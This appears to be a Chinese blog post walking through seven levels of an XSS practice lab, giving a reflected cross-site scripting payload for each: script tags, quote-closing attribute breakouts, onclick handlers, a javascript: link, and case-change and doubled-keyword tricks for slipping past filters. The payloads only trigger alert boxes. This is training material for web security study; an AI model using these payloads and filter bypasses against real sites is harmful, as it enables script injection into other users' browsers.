XSS基础学习(2)

XSS基础学习(2)

六、靶场实践

第一关
http://8.130.109.21:9995/level1.php?name=test
// 通过页面发现输入点,name=test,test是输入点,先输入<,查看页面源码,此时<未被转义,构建以下payload。通关
//payload
http://8.130.109.21:9995/level1.php?name=<script>alert(1);</script>
第二关
http://8.130.109.21:9995/level2.php?keyword=test
// 查看页面源码<input name=keyword  value="test">,需要闭合,构建payload
//payload,在输入框中输入
"><script>alert(1);</script>
第三关
http://8.130.109.21:9995/level3.php?keyword=%3E&submit=%E6%90%9C%E7%B4%A2
// 在输入点输入>,然后查看页面源码,发现<input name=keyword  value='&gt;'>,此时>被转义,此时可以用onclick来构建payload
//payload 输入框内输入,提交后点击输入框
' onclick='javascript:alert(1)
第四关
http://8.130.109.21:9995/level4.php?keyword=try%20harder!
// 查看页面源码,发现闭合方式是双引号闭合
<input name=keyword  value="try harder!">
//payload构建
" onclick="javascript:alert(1)
第五关
http://8.130.109.21:9995/level5.php?keyword=find%20a%20way%20out!
// 输入onclicke等关键字,会发现
<input name=keyword  value="" o_nclick="javascript:alert(1)">
//payload
"> <a href="javascript:alert(`xss`);">xss</a
第六关
http://8.130.109.21:9995/level6.php?keyword=break%20it%20out!
// 输入点输入 " onclick="javascript:alert(1) 发现
<input name=keyword  value="" o_nclick="javascript:alert(1)">试试大小写绕过的方式
//payload
" ONclick="javascript:alert(1)
第七关
http://8.130.109.21:9995/level7.php?keyword=move%20up!
// 输入点输入 " onclick="javascript:alert(1) 发现
<input name=keyword  value="" click="java:alert(1)">,发现消去关键字,试试双写绕过
" oONnclick="javascript:alert(1)
posted @   凉城厌心  阅读(15)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 25岁的心里话
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· 闲置电脑爆改个人服务器(超详细) #公网映射 #Vmware虚拟网络编辑器
· 一起来玩mcp_server_sqlite,让AI帮你做增删改查!!
· 零经验选手,Compose 一天开发一款小游戏!
点击右上角即可分享
微信分享提示